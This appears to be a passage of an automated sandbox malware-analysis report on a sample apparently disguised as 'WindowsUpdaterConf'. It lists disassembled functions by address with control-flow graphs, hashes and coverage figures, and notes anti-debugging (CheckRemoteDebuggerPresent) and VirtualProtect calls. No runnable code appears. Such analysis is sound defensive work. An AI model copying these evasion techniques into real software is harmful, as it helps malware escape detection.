                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq$`Qfq
                                                                                          • API String ID: 0-872445281
                                                                                          • Opcode ID: 571181d65bfe8a79cda5774ce963891b41f5a77c3f555aad5b2b8bd4fb9ac24d
                                                                                          • Instruction ID: 31e031ac24e01f7c62f96bffa01e9f0f5bbae92be5d17c6182684e55d927b788
                                                                                          • Opcode Fuzzy Hash: 571181d65bfe8a79cda5774ce963891b41f5a77c3f555aad5b2b8bd4fb9ac24d
                                                                                          • Instruction Fuzzy Hash: 19514574A00219CFEBA59F65D9587ADBBB5FB44300F0085A9E90AA7394DB349F81CF81
                                                                                          Function 02392E00 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 675 2392e00-2392e8c CheckRemoteDebuggerPresent 677 2392e8e-2392e94 675->677 678 2392e95-2392ed0 675->678 677->678
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02392E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2355248401.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_2390000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 9dda0ebc3136dc7cf68b9bc3baa90944431311654c27544d85a36110e287dead
                                                                                          • Instruction ID: e90e772339782a741104f04afeb2f83b1c381268eda5b34c84719a83aa8a10c2
                                                                                          • Opcode Fuzzy Hash: 9dda0ebc3136dc7cf68b9bc3baa90944431311654c27544d85a36110e287dead
                                                                                          • Instruction Fuzzy Hash: 112136B1C002598FCB10CFAAD485BEEFBF4AF49320F14845AE859A7251D7789A44CF60
                                                                                          Function 02392E08 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 681 2392e08-2392e8c CheckRemoteDebuggerPresent 683 2392e8e-2392e94 681->683 684 2392e95-2392ed0 681->684 683->684
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02392E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2355248401.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_2390000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 8f6d949ae6bc572ef6924c6734f8730be0697bf4571bb59aab8c8c87b3e7d779
                                                                                          • Instruction ID: 8d616e6b309c72e49c337556f64233979e049dd5d30e82e71b80fc5363ffca65
                                                                                          • Opcode Fuzzy Hash: 8f6d949ae6bc572ef6924c6734f8730be0697bf4571bb59aab8c8c87b3e7d779
                                                                                          • Instruction Fuzzy Hash: 1A2128B1C002598FCB10CF9AD585BEEBBF8AF49320F14845AE859A7250D778A944CF61
                                                                                          Function 01948970 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 687 1948970-19489f1 VirtualProtect 690 19489f3-19489f9 687->690 691 19489fa-1948a1f 687->691 690->691
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 019489E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2347478251.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_1940000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 1c6edff5b075c38e0e1c146ad971ec920a63a6ccc4c2fa991c1fc5e881145d95
                                                                                          • Instruction ID: 5790e0c0c43c72ee5399027532dc757bf20571d200f85e032f609a601510092b
                                                                                          • Opcode Fuzzy Hash: 1c6edff5b075c38e0e1c146ad971ec920a63a6ccc4c2fa991c1fc5e881145d95
                                                                                          • Instruction Fuzzy Hash: 8B1108B1D003099FDB10DFAAC545AAEFBF5FF98320F14841AD519A7250C7759540CFA1
                                                                                          Function 0656BF50 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 919 656bf50-656bf74 920 656bf76-656bfd4 919->920 921 656bfdc-656bfe3 919->921 920->921 922 656c056-656c067 921->922 923 656bfe5-656c019 921->923 924 656c06e-656c090 922->924 925 656c069 922->925 930 656c021-656c04a 923->930 933 656c092-656c09b 924->933 934 656c0ff-656c194 call 6567550 924->934 925->924 957 656c1fc-656c24e 930->957 959 656c050 930->959 936 656c09d-656c0a2 933->936 937 656c0aa-656c0b0 933->937 947 656c1b5-656c1bb 934->947 936->937 941 656c0b6-656c0ba 937->941 942 656c1b0 937->942 941->934 945 656c0bc-656c0c5 941->945 942->947 949 656c0c7-656c0cc 945->949 950 656c0d4-656c0da 945->950 951 656c1c5 947->951 952 656c1bd 947->952 949->950 950->942 954 656c0e0-656c0fa 950->954 951->957 952->951 954->947 967 656c250-656c256 957->967 959->922 968 656c25c 967->968 969 656dfda-656dfde 967->969 968->969 970 656ec87-656eca0 969->970 971 656dfe4-656dfef 969->971 977 656eca2-656eca7 970->977 978 656ec7e-656ec84 970->978 971->967 978->970
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: 0ac4da437503f9da4b19de697bef81732e9aaa9c9fccec39f014d71c97450ccd
                                                                                          • Instruction ID: 83ad6b7de387fcb3b440e1930e8083fb939d397c77c4eb0bb39c6970c6c30be3
                                                                                          • Opcode Fuzzy Hash: 0ac4da437503f9da4b19de697bef81732e9aaa9c9fccec39f014d71c97450ccd
                                                                                          • Instruction Fuzzy Hash: 0591E170A002148FCB54DF29C584A6EBBF2FF89310F118969E815AB3A1DB35AC01CFD4
                                                                                          Function 01948B40 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1004 1948b40-1948baf CloseHandle 1007 1948bb1-1948bb7 1004->1007 1008 1948bb8-1948bdd 1004->1008 1007->1008
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2347478251.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_1940000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: fff5a999ffbc293a124478ae4022d53c594be3c425496f71f9baea294a901dbd
                                                                                          • Instruction ID: 04285f6753a2804e0508b221733262e7e3c38c483d2832ff942713e79f2e15f5
                                                                                          • Opcode Fuzzy Hash: fff5a999ffbc293a124478ae4022d53c594be3c425496f71f9baea294a901dbd
                                                                                          • Instruction Fuzzy Hash: 36113AB1D003498FDB20DFAAC545B9EFBF9EF88324F248419D519A7640C775A540CB91
                                                                                          Function 0656FC10 Relevance: .2, Instructions: 166COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1084 656fc10-656fc5f call 656bf28 call 6568a58 1140 656fc61 call 23929c1 1084->1140 1141 656fc61 call 23929d0 1084->1141 1091 656fc67-656fc8c 1144 656fc8f call 2392a30 1091->1144 1145 656fc8f call 2392a20 1091->1145 1094 656fc95-656fc97 1095 656fe87-656fe9a 1094->1095 1096 656fc9d-656fcb2 1094->1096 1097 656fe9c-656fea0 1095->1097 1142 656fcb5 call 2392a90 1096->1142 1143 656fcb5 call 2392a80 1096->1143 1099 656fea2-656feab call 6568760 1097->1099 1100 656feb0 1097->1100 1099->1100 1102 656fcbb-656fd50 call 656bf28 * 2 1114 656fd52-656fdc5 call 656bf28 * 2 1102->1114 1115 656fdcb-656fdfe call 656bf28 1102->1115 1114->1115 1124 656fe54-656fe6e 1114->1124 1115->1124 1125 656fe00-656fe52 call 656bf28 * 2 1115->1125 1124->1097 1125->1124 1138 656fe70-656fe81 1125->1138 1138->1095 1138->1096 1140->1091 1141->1091 1142->1102 1143->1102 1144->1094 1145->1094
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d623c2be3905cf58ba12278ef033460a8bf907efd899fb8462c6529d814f5e73
                                                                                          • Instruction ID: 1007d6d31232aa7ffd266ab4e716cb74c5a64ee36a75f204e91d8fd0d39c5441
                                                                                          • Opcode Fuzzy Hash: d623c2be3905cf58ba12278ef033460a8bf907efd899fb8462c6529d814f5e73
                                                                                          • Instruction Fuzzy Hash: E9516B34B001428FDB94AB65E49962F77ABFB88B01F508928E946D7385DF389D05CB91
                                                                                          Function 06567B70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e29e1eddaa9851fb018cceda6911a4639c86d36e7da04c2a8e983e42b9995c9
                                                                                          • Instruction ID: 1e03b05aa6eceda474376339f490f72ca7b7d1a0110c409c6b92acd55ab996dc
                                                                                          • Opcode Fuzzy Hash: 0e29e1eddaa9851fb018cceda6911a4639c86d36e7da04c2a8e983e42b9995c9
                                                                                          • Instruction Fuzzy Hash: 373190747001098FD759AF68E05926F3BAAFB89B44F508829D902D7385DF385E05CFD1
                                                                                          Function 065617FF Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 922af7641e4d5e5ca5db60d2b220ca21ad142106e05beec45c968d45f085f9fe
                                                                                          • Instruction ID: a1d23162258a6459eca3904248fc96530c04a1dba5fc744ca7b8b9ded81b97e6
                                                                                          • Opcode Fuzzy Hash: 922af7641e4d5e5ca5db60d2b220ca21ad142106e05beec45c968d45f085f9fe
                                                                                          • Instruction Fuzzy Hash: D6014B74A003598FD7A4CF29C99979A77B9FB44300F0084A9E909A7255DB359E44CF15
                                                                                          Function 0656FB20 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d963e837ce676427947db597523cfa94c05c9d9657f8d4d20372ebcc99a720a5
                                                                                          • Instruction ID: 2c8c91fc636fb349c40776a60f35cb35e5bf272cd657c727049eae16285265e6
                                                                                          • Opcode Fuzzy Hash: d963e837ce676427947db597523cfa94c05c9d9657f8d4d20372ebcc99a720a5
                                                                                          • Instruction Fuzzy Hash: E2F01D307142018FD754AF65F46A52A336FFB94B86F408828E88687395DB249C11CBD5
                                                                                          Function 06560ACB Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1c15a395806ac5d5987c6b0e37c80cdd96358b17f1175bc627d26d687d3c0c2
                                                                                          • Instruction ID: 9e7b363e57199e1175d303c14dae50fe8d5b2becde8bc7d8ef3e0ac051edae09
                                                                                          • Opcode Fuzzy Hash: f1c15a395806ac5d5987c6b0e37c80cdd96358b17f1175bc627d26d687d3c0c2
                                                                                          • Instruction Fuzzy Hash: 67F03A74E14218CFE7A4CF19D8897AA7775FB45311F108495E90AE3390CB319E84CF45
                                                                                          Function 06565043 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3e2a07e7e931e15980507fd66d895d4d943280a5ee437d334bf7b72d8835f1e
                                                                                          • Instruction ID: ac230ea733ccafb2a62d0a7c8bb0f52693a5c2efc770734e2c69af7d48cd2693
                                                                                          • Opcode Fuzzy Hash: a3e2a07e7e931e15980507fd66d895d4d943280a5ee437d334bf7b72d8835f1e
                                                                                          • Instruction Fuzzy Hash: 88E0C9B49002189FD794DF15D88979ABBB5FB48300F108495E919A3390D7305E84CF45
                                                                                          Function 0656504F Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3e2a07e7e931e15980507fd66d895d4d943280a5ee437d334bf7b72d8835f1e
                                                                                          • Instruction ID: ac230ea733ccafb2a62d0a7c8bb0f52693a5c2efc770734e2c69af7d48cd2693
                                                                                          • Opcode Fuzzy Hash: a3e2a07e7e931e15980507fd66d895d4d943280a5ee437d334bf7b72d8835f1e
                                                                                          • Instruction Fuzzy Hash: 88E0C9B49002189FD794DF15D88979ABBB5FB48300F108495E919A3390D7305E84CF45
                                                                                          Function 06567D28 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a7d5d56dc26340c99dfa59675f62cc558d4d210a2363084fcb92f4efb485861
                                                                                          • Instruction ID: 788b5e82e82a38a3a3ef3c34d1412a2f68528d7ce84177a524093ee76073d125
                                                                                          • Opcode Fuzzy Hash: 0a7d5d56dc26340c99dfa59675f62cc558d4d210a2363084fcb92f4efb485861
                                                                                          • Instruction Fuzzy Hash: 66D05E71900208EBCB40DFE0990546E7BF8EF49210B1049A5D404D3210ED324A009B81
                                                                                          Function 06565134 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bdbaf2c7223f6fa426ea907e4a8740b18776f27bd6ff4b88e4d69970b87e44a6
                                                                                          • Instruction ID: 4888fe253c850c080d3dc6252039bb3853181a3fc6d19aab5fdd2b031400eb5a
                                                                                          • Opcode Fuzzy Hash: bdbaf2c7223f6fa426ea907e4a8740b18776f27bd6ff4b88e4d69970b87e44a6
                                                                                          • Instruction Fuzzy Hash: 28D067B4A001148FDBA49F65E99879D76B1AB48201F5098AAE64AE3294DF304F84CF14
                                                                                          Function 0656BF28 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 065686F0 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 06568780 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7ed03fdfbc58d883974a833c83ac27150033fcc6452e0f2abba90bd6c81d1c60
                                                                                          • Instruction ID: 739578efb3a93a971c5161d72b6cc1e594b662dde43dba299e36aacec1e212a5
                                                                                          • Opcode Fuzzy Hash: 7ed03fdfbc58d883974a833c83ac27150033fcc6452e0f2abba90bd6c81d1c60
                                                                                          • Instruction Fuzzy Hash: F3C02B3030010C47C30A2648E05506B338FF3C8F04F800010C90583742CE302E04CBD1
                                                                                          Function 06561A64 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 86e29fa37bb2e5f98451daeb71d08fe127d0ba677bf7b9481cd3339df82a0c40
                                                                                          • Instruction ID: 6f44501e7b185444747c18b45c593b24061be98519c8ba07982975c748463685
                                                                                          • Opcode Fuzzy Hash: 86e29fa37bb2e5f98451daeb71d08fe127d0ba677bf7b9481cd3339df82a0c40
                                                                                          • Instruction Fuzzy Hash: 9FC00274A042048FDB645BB5A11C2597AA1BB48351F401466E88BC3394DB348B40CF55
                                                                                          Function 06568760 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Function 065676A0 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Function 065687F0 Relevance: .0, Instructions: 7COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Function 06567310 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3858c2f717bbfcf3abeb9d24018c93a76ac354519c204f2c8d06059f9930f922
                                                                                          • Instruction ID: 6f766276e1a05df55c0283f2488e661967c05281d36e075946208d19a3767afc
                                                                                          • Opcode Fuzzy Hash: 3858c2f717bbfcf3abeb9d24018c93a76ac354519c204f2c8d06059f9930f922
                                                                                          • Instruction Fuzzy Hash: 2AA02230002B0C83C20832B02000820338C88C0008B8008BCA30C08A220833E8A08088
                                                                                          Function 06567680 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 574adaa55dcae349d757b2c1b745a65a49815ccd69b1640b126e2d708c0f9044
                                                                                          • Instruction ID: 8d1cf333687cb8af11a9da085cf093de6a61a003ea3f1c3672aa43aef1d26fff
                                                                                          • Opcode Fuzzy Hash: 574adaa55dcae349d757b2c1b745a65a49815ccd69b1640b126e2d708c0f9044
                                                                                          • Instruction Fuzzy Hash: 90A0243044170CC7C3041770700D410735CF5003057404C74D10C005114733D030C550
                                                                                          Function 06567A70 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7b02900973662f5e16b5a1e1e34e90d426e5c90a272e601773e96cef6e2fbee2
                                                                                          • Instruction ID: 7f1c40124d1dc10ecf477a320adfed376fc27d5b9d724bd2e813e915c60e67e9
                                                                                          • Opcode Fuzzy Hash: 7b02900973662f5e16b5a1e1e34e90d426e5c90a272e601773e96cef6e2fbee2
                                                                                          • Instruction Fuzzy Hash: 7290223000820CCB02002388300820A330CA0000083800000E00C000000B0820000A82
                                                                                          Function 06561A17 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000021.00000002.2409321653.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_33_2_6560000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b5b537851a5147e952fea5057e33e1b0c605fa2e1a4b15621304c544b1e8d150
                                                                                          • Instruction ID: ebfe82f6d2d020ea280ff55319ebfa21ca678937532d63e54df6e836b12a9162
                                                                                          • Opcode Fuzzy Hash: b5b537851a5147e952fea5057e33e1b0c605fa2e1a4b15621304c544b1e8d150
                                                                                          • Instruction Fuzzy Hash: 31B01130208208CFE3A08A02CE0C2AA3222BB80302F0002A0B002A22A08B308E80CF00

                                                                                          Execution Graph

                                                                                          Execution Coverage:9.7%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:24
                                                                                          Total number of Limit Nodes:0
